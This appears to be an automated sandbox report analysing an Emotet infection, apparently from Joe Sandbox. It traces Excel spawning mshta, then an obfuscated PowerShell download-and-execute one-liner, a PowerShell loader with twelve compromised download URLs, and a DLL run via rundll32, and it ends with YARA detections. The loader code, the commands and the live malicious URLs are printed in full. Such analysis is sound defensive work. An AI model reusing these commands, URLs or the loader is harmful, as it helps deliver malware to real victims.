                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Jan 28, 2022 21:01:38.788352966 CET192.168.2.228.8.8.80x77a6Standard query (0)hostfeeling.comA (IP address)IN (0x0001)
                                  Jan 28, 2022 21:01:59.982759953 CET192.168.2.228.8.8.80xf0b3Standard query (0)jurnalpjf.lan.go.idA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Jan 28, 2022 21:01:38.832066059 CET8.8.8.8192.168.2.220x77a6No error (0)hostfeeling.com164.90.147.135A (IP address)IN (0x0001)
                                  Jan 28, 2022 21:02:00.001409054 CET8.8.8.8192.168.2.220xf0b3No error (0)jurnalpjf.lan.go.id103.206.244.105A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • 91.240.118.172
                                  • jurnalpjf.lan.go.id

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.224916791.240.118.17280C:\Windows\System32\mshta.exe
                                  TimestampkBytes transferredDirectionData
                                  Jan 28, 2022 21:01:33.881614923 CET0OUTGET /gg/ff/fe.html HTTP/1.1
                                  Accept: */*
                                  Accept-Language: en-US
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: 91.240.118.172
                                  Connection: Keep-Alive
                                  Jan 28, 2022 21:01:33.943207026 CET2INHTTP/1.1 200 OK
                                  Server: nginx/1.20.2
                                  Date: Fri, 28 Jan 2022 20:01:33 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Data Raw: 32 62 32 65 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 5b 30 5d 3d 27 25 36 44 5c 31 37 30 25 33 38 25 33 38 25 33 33 25 33 34 25 33 34 25 34 31 27 20 20 20 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7d 0c 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 19 7f 36 7f 31 7f 79 7f 25 7f 33 7f 37 7d 24 7f 44 7d 1d 7d 26 7f 32 7d 26 7f 33 7f 42 7d 20 7f 31 7d 19 7f 37 7f 31 7d 24 7f 38 7d 5c 27 7d 19 7f 32 7f 33 7f 25 7f 37 7f 34 7d 06 7d 19 7f 35 7f 36 7f 25 7f 36 7d 2a 7f 45 7f 66 7d 20 7f 32 7d 3e 7f 37 7f 6d 7f 43 7f 68 7d 41 7f 31 7f 72 7f 25 7f 34 7f 33 7d 48 7d 19 7f 34 7f 34 7f 65 7d 1d 7d 35 7f 33 7d 33 7f 33 7d 39 7f 32 7f 43 7d 24 7d 5b 7f 30 7d 1d 7f 39 7d 24 7f 42 7d 45 7f 31 7f 35 7f 37 7d 4f 7f 32 7d 35 7f 36 7d 64 7f 33 7d 28 7f 33 7d 62 7d 2d 7f 69 7d 24 7d 5f 7f
                                  Data Ascii: 2b2e<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'}\\162%20}61y%37}$D}}&2}&3B} 1}71}$8}\'}23%74}}56%6}*Ef} 2}>7mCh}A1r%43}H}44e}}53}33}92C}$}[0}9}$B}E157}O2}56}d3}(3}b}-i}$}_


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.224916891.240.118.17280C:\Windows\System32\mshta.exe
                                  TimestampkBytes transferredDirectionData
                                  Jan 28, 2022 21:01:38.683579922 CET12OUTGET /gg/ff/fe.png HTTP/1.1
                                  Host: 91.240.118.172
                                  Connection: Keep-Alive
                                  Jan 28, 2022 21:01:38.745675087 CET14INHTTP/1.1 200 OK
                                  Server: nginx/1.20.2
                                  Date: Fri, 28 Jan 2022 20:01:38 GMT
                                  Content-Type: image/png
                                  Content-Length: 1199
                                  Connection: keep-alive
                                  Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT
                                  ETag: "4af-5d6a59dbe5e00"
                                  Accept-Ranges: bytes
                                  Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 73 65 65 64 61 7d 3a 5c 50 72 7b 73 65 65 64 61 7d 6f 67 72 61 6d 44 7b 73 65 65 64 61 7d 61 74 61 5c 7b 73 65 65 64 61 7d 4a 6f 6f 53 65 65 2e 64 7b 73 65 65 64 61 7d 6c 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 73 65 65 64 61 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 68 6f 73 74 66 65 65 6c 69 6e 67 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 34 58 73 6a 74 4f 54 37 63 46 48 76 42 56 33 48 5a 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 75 72 6e 61 6c 70 6a 66 2e 6c 61 6e 2e 67 6f 2e 69 64 2f 61 73 73 65 74 73 2f 69 4d 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 69 74 2d 6f 2e 62 69 7a 2f 62 69 74 72 69 78 2f 78 6f 44 64 44 65 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 62 69 6d 65 73 61 72 61 79 65 6e 6f 76 69 6e 2e 69 72 2f 77 70 2d 61 64 6d 69 6e 2f 47 31 70 59 47 4c 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 67 61 72 64 65 6e 69 6e 67 66 69 6c 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 63 4d 56 55 59 44 51 33 71 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 64 61 69 73 79 2e 73 75 6b 6f 62 75 72 75 2d 73 65 63 75 72 65 2e 63 6f 6d 2f 38 70 6c 6b 73 2f 76 38 6c 79 5a 54 65 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 72 6f 70 65 72 74 79 2d 65 67 2e 63 6f 6d 2f 6d 6c 7a 6b 69 72 2f 39 37 76 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 6f 74 61 6c 70 6c 61 79 74 75 78 74 6c 61 2e 63 6f 6d 2f 73 69 74 69 6f 2f 44 67 6b 74 4c 33 7a 64 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 78 74 64 65 76 65 6c 6f 70 65 72 2e 63 6f 6d 2f 6f 6b 77 39 79 78 2f 47 63 32 38 5a 58 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 61 62 6c 72 2e 63 6f 6d 2f 65 6c 65 6e 63 74 69 63 2f 66 4d 46 74 52 72 62 73 45 58 31 67 58 75 33 5a 31 4d 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 63 74 69 76 65 74 72 61 69 6e 69 6e 67 2e 73 79 74 65 73 2e 6e 65 74 2f 6c 69 62 72 61 72 69 65 73 2f 38 73 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 75 64 61 6e 67 74 61 73 6f 72 69 63 68 69 6e 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 47 47 30 31 63 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d
                                  Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.2249170103.206.244.10580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampkBytes transferredDirectionData
                                  Jan 28, 2022 21:02:00.181602955 CET15OUTGET /assets/iM/ HTTP/1.1
                                  Host: jurnalpjf.lan.go.id
                                  Connection: Keep-Alive
                                  Jan 28, 2022 21:02:00.370345116 CET17INHTTP/1.1 200 OK
                                  Date: Fri, 28 Jan 2022 20:02:00 GMT
                                  Server: Apache/2.4.6 (CentOS) PHP/7.4.27
                                  X-Powered-By: PHP/7.4.27
                                  Set-Cookie: 61f44bb842acf=1643400120; expires=Fri, 28-Jan-2022 20:03:00 GMT; Max-Age=60; path=/
                                  Cache-Control: no-cache, must-revalidate
                                  Pragma: no-cache
                                  Last-Modified: Fri, 28 Jan 2022 20:02:00 GMT
                                  Expires: Fri, 28 Jan 2022 20:02:00 GMT
                                  Content-Disposition: attachment; filename="uHkwl.dll"
                                  Content-Transfer-Encoding: binary
                                  Content-Length: 548864
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-msdownload
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  3192.168.2.2249172160.16.102.16880C:\Windows\SysWOW64\rundll32.exe
                                  TimestampkBytes transferredDirectionData


                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:21:01:18
                                  Start date:28/01/2022
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                  Imagebase:0x13f3d0000
                                  File size:28253536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:2
                                  Start time:21:01:19
                                  Start date:28/01/2022
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                                  Imagebase:0x4a610000
                                  File size:345088 bytes
                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:4
                                  Start time:21:01:20
                                  Start date:28/01/2022
                                  Path:C:\Windows\System32\mshta.exe
                                  Wow64 process (32bit):false
                                  Commandline:mshta http://91.240.118.172/gg/ff/fe.html
                                  Imagebase:0x13f860000
                                  File size:13824 bytes
                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:6
                                  Start time:21:01:23
                                  Start date:28/01/2022
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                  Imagebase:0x13ffa0000
                                  File size:473600 bytes
                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  General

                                  Target ID:8
                                  Start time:21:01:56
                                  Start date:28/01/2022
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                  Imagebase:0x4a870000
                                  File size:345088 bytes
                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:9
                                  Start time:21:01:56
                                  Start date:28/01/2022
                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                  Imagebase:0x650000
                                  File size:44544 bytes
                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:10
                                  Start time:21:01:59
                                  Start date:28/01/2022
                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                  Imagebase:0x650000
                                  File size:44544 bytes
                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:11
                                  Start time:21:02:16
                                  Start date:28/01/2022
                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
                                  Imagebase:0x650000
                                  File size:44544 bytes
                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
